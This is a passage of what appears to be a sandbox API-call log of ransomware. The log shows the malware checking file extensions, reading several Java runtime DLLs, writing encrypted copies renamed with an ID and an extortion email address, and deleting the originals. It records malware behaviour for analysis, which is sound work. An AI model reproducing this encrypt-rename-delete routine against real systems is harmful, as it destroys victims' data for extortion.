(lpString=".ppt") returned 4 [0197.880] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0197.880] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe") returned 48 [0197.880] lstrlenW (lpString=".zip") returned 4 [0197.880] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0197.880] lstrlenW (lpString=".rar") returned 4 [0197.880] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0197.880] lstrlenW (lpString=".bz2") returned 4 [0197.880] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0197.880] lstrlenW (lpString=".7z") returned 3 [0197.880] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0197.880] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe") returned 48 [0197.880] lstrlenW (lpString=".dbf") returned 4 [0197.880] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0197.880] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe") returned 48 [0197.880] lstrlenW (lpString=".1cd") returned 4 [0197.880] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0197.880] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe") returned 48 [0197.880] lstrlenW (lpString=".jpg") returned 4 [0197.880] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0197.880] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe") returned 48 [0197.880] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe") returned 48 [0197.880] lstrlenW (lpString=".doc") returned 4 [0197.881] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0197.881] lstrlenW (lpString=".docx") returned 5 [0197.881] lstrcmpiW (lpString1=".docx", lpString2="t.exe") returned -1 [0197.881] lstrlenW (lpString=".pdf") returned 4 [0197.881] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0197.881] lstrlenW (lpString=".xls") returned 4 [0197.881] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0197.881] lstrlenW (lpString=".xlsx") returned 5 [0197.881] lstrcmpiW (lpString1=".xlsx", lpString2="t.exe") returned -1 [0197.881] lstrlenW (lpString=".ppt") returned 4 [0197.881] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0197.881] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe") returned 48 [0197.881] lstrlenW (lpString=".zip") returned 4 [0197.881] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0197.881] lstrlenW (lpString=".rar") returned 4 [0197.881] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0197.881] lstrlenW (lpString=".bz2") returned 4 [0197.881] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0197.881] lstrlenW (lpString=".7z") returned 3 [0197.881] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0197.881] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe") returned 48 [0197.881] lstrlenW (lpString=".dbf") returned 4 [0197.881] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0197.881] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe") returned 48 [0197.881] lstrlenW (lpString=".1cd") returned 4 [0197.881] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0197.881] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe") returned 48 [0197.882] lstrlenW (lpString=".jpg") returned 4 [0197.882] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0197.882] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.882] lstrlenW (lpString="lcms.dll") returned 8 [0197.882] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\lcms.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0197.883] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=233536) returned 1 [0197.883] CloseHandle (hObject=0x38c) returned 1 [0197.883] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\lcms.dll")) returned 0x20 [0197.883] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\lcms.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.883] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\lcms.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0197.883] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.883] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.883] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\lcms.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0197.884] GetLastError () returned 0x0 [0197.884] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x39040, lpOverlapped=0x0) returned 1 [0197.921] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x39050, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x39050, lpOverlapped=0x0) returned 1 [0197.925] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.925] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.925] SetEndOfFile (hFile=0x39c) returned 1 [0197.926] CloseHandle (hObject=0x39c) returned 1 [0197.926] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.926] SetEndOfFile (hFile=0x38c) returned 1 [0197.929] CloseHandle (hObject=0x38c) returned 1 [0197.929] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.929] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\lcms.dll")) returned 1 [0197.929] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll") returned 47 [0197.929] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll") returned 47 [0197.929] lstrlenW (lpString=".doc") returned 4 [0197.929] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.929] lstrlenW (lpString=".docx") returned 5 [0197.929] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.929] lstrlenW (lpString=".pdf") returned 4 [0197.929] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.930] lstrlenW (lpString=".xls") returned 4 [0197.930] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.930] lstrlenW (lpString=".xlsx") returned 5 [0197.930] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.930] lstrlenW (lpString=".ppt") returned 4 [0197.930] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.930] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll") returned 47 [0197.930] lstrlenW (lpString=".zip") returned 4 [0197.930] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.930] lstrlenW (lpString=".rar") returned 4 [0197.930] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.930] lstrlenW (lpString=".bz2") returned 4 [0197.930] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.930] lstrlenW (lpString=".7z") returned 3 [0197.930] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.930] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll") returned 47 [0197.930] lstrlenW (lpString=".dbf") returned 4 [0197.930] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.930] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll") returned 47 [0197.930] lstrlenW (lpString=".1cd") returned 4 [0197.930] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.930] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll") returned 47 [0197.930] lstrlenW (lpString=".jpg") returned 4 [0197.930] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.930] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll") returned 47 [0197.930] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll") returned 47 [0197.930] lstrlenW (lpString=".doc") returned 4 [0197.930] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.931] lstrlenW (lpString=".docx") returned 5 [0197.931] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.931] lstrlenW (lpString=".pdf") returned 4 [0197.931] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.931] lstrlenW (lpString=".xls") returned 4 [0197.931] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.931] lstrlenW (lpString=".xlsx") returned 5 [0197.931] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.931] lstrlenW (lpString=".ppt") returned 4 [0197.931] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.931] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll") returned 47 [0197.931] lstrlenW (lpString=".zip") returned 4 [0197.931] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.931] lstrlenW (lpString=".rar") returned 4 [0197.931] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.931] lstrlenW (lpString=".bz2") returned 4 [0197.931] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.931] lstrlenW (lpString=".7z") returned 3 [0197.931] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.931] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll") returned 47 [0197.931] lstrlenW (lpString=".dbf") returned 4 [0197.931] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.931] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll") returned 47 [0197.931] lstrlenW (lpString=".1cd") returned 4 [0197.931] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.931] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll") returned 47 [0197.931] lstrlenW (lpString=".jpg") returned 4 [0197.931] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.932] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.932] lstrlenW (lpString="mlib_image.dll") returned 14 [0197.932] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\mlib_image.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0197.932] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=653888) returned 1 [0197.932] CloseHandle (hObject=0x38c) returned 1 [0197.932] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\mlib_image.dll")) returned 0x20 [0197.933] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\mlib_image.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.933] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\mlib_image.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0197.933] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.933] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.933] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\mlib_image.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0197.933] GetLastError () returned 0x0 [0197.934] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x9fa40, lpOverlapped=0x0) returned 1 [0198.453] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x9fa50, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x9fa50, lpOverlapped=0x0) returned 1 [0198.464] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.464] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xf0, lpOverlapped=0x0) returned 1 [0198.464] SetEndOfFile (hFile=0x39c) returned 1 [0198.464] CloseHandle (hObject=0x39c) returned 1 [0198.465] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.465] SetEndOfFile (hFile=0x38c) returned 1 [0198.469] CloseHandle (hObject=0x38c) returned 1 [0198.470] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0198.470] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\mlib_image.dll")) returned 1 [0198.470] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll") returned 53 [0198.470] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll") returned 53 [0198.470] lstrlenW (lpString=".doc") returned 4 [0198.470] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.470] lstrlenW (lpString=".docx") returned 5 [0198.470] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0198.470] lstrlenW (lpString=".pdf") returned 4 [0198.470] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.470] lstrlenW (lpString=".xls") returned 4 [0198.470] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.470] lstrlenW (lpString=".xlsx") returned 5 [0198.470] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0198.470] lstrlenW (lpString=".ppt") returned 4 [0198.470] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.470] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll") returned 53 [0198.470] lstrlenW (lpString=".zip") returned 4 [0198.470] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.470] lstrlenW (lpString=".rar") returned 4 [0198.470] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.471] lstrlenW (lpString=".bz2") returned 4 [0198.471] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.471] lstrlenW (lpString=".7z") returned 3 [0198.471] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.471] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll") returned 53 [0198.471] lstrlenW (lpString=".dbf") returned 4 [0198.471] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.471] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll") returned 53 [0198.471] lstrlenW (lpString=".1cd") returned 4 [0198.471] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.471] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll") returned 53 [0198.471] lstrlenW (lpString=".jpg") returned 4 [0198.471] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.471] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll") returned 53 [0198.471] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll") returned 53 [0198.471] lstrlenW (lpString=".doc") returned 4 [0198.471] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.471] lstrlenW (lpString=".docx") returned 5 [0198.471] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0198.471] lstrlenW (lpString=".pdf") returned 4 [0198.471] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.471] lstrlenW (lpString=".xls") returned 4 [0198.471] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.471] lstrlenW (lpString=".xlsx") returned 5 [0198.471] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0198.471] lstrlenW (lpString=".ppt") returned 4 [0198.471] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.471] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll") returned 53 [0198.471] lstrlenW (lpString=".zip") returned 4 [0198.471] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.471] lstrlenW (lpString=".rar") returned 4 [0198.471] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.471] lstrlenW (lpString=".bz2") returned 4 [0198.472] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.472] lstrlenW (lpString=".7z") returned 3 [0198.472] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.472] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll") returned 53 [0198.472] lstrlenW (lpString=".dbf") returned 4 [0198.472] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.472] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll") returned 53 [0198.472] lstrlenW (lpString=".1cd") returned 4 [0198.472] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.472] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll") returned 53 [0198.472] lstrlenW (lpString=".jpg") returned 4 [0198.472] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.472] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0198.472] lstrlenW (lpString="npt.dll") returned 7 [0198.472] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\npt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0198.473] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=19008) returned 1 [0198.473] CloseHandle (hObject=0x38c) returned 1 [0198.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\npt.dll")) returned 0x20 [0198.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\npt.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0198.473] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\npt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0198.473] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.473] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.473] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\npt.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0198.474] GetLastError () returned 0x0 [0198.474] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x4a40, lpOverlapped=0x0) returned 1 [0198.519] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x4a50, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x4a50, lpOverlapped=0x0) returned 1 [0198.522] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.522] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xe2, lpOverlapped=0x0) returned 1 [0198.523] SetEndOfFile (hFile=0x39c) returned 1 [0198.523] CloseHandle (hObject=0x39c) returned 1 [0198.523] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.523] SetEndOfFile (hFile=0x38c) returned 1 [0198.524] CloseHandle (hObject=0x38c) returned 1 [0198.524] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0198.524] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\npt.dll")) returned 1 [0198.524] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll") returned 46 [0198.524] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll") returned 46 [0198.524] lstrlenW (lpString=".doc") returned 4 [0198.524] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.524] lstrlenW (lpString=".docx") returned 5 [0198.524] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0198.524] lstrlenW (lpString=".pdf") returned 4 [0198.524] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.524] lstrlenW (lpString=".xls") returned 4 [0198.524] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.525] lstrlenW (lpString=".xlsx") returned 5 [0198.525] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0198.525] lstrlenW (lpString=".ppt") returned 4 [0198.525] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.525] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll") returned 46 [0198.525] lstrlenW (lpString=".zip") returned 4 [0198.525] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.525] lstrlenW (lpString=".rar") returned 4 [0198.525] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.525] lstrlenW (lpString=".bz2") returned 4 [0198.525] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.525] lstrlenW (lpString=".7z") returned 3 [0198.525] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.525] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll") returned 46 [0198.525] lstrlenW (lpString=".dbf") returned 4 [0198.525] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.525] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll") returned 46 [0198.525] lstrlenW (lpString=".1cd") returned 4 [0198.525] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.525] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll") returned 46 [0198.525] lstrlenW (lpString=".jpg") returned 4 [0198.525] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.525] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll") returned 46 [0198.525] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll") returned 46 [0198.525] lstrlenW (lpString=".doc") returned 4 [0198.525] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.525] lstrlenW (lpString=".docx") returned 5 [0198.525] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0198.525] lstrlenW (lpString=".pdf") returned 4 [0198.525] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.525] lstrlenW 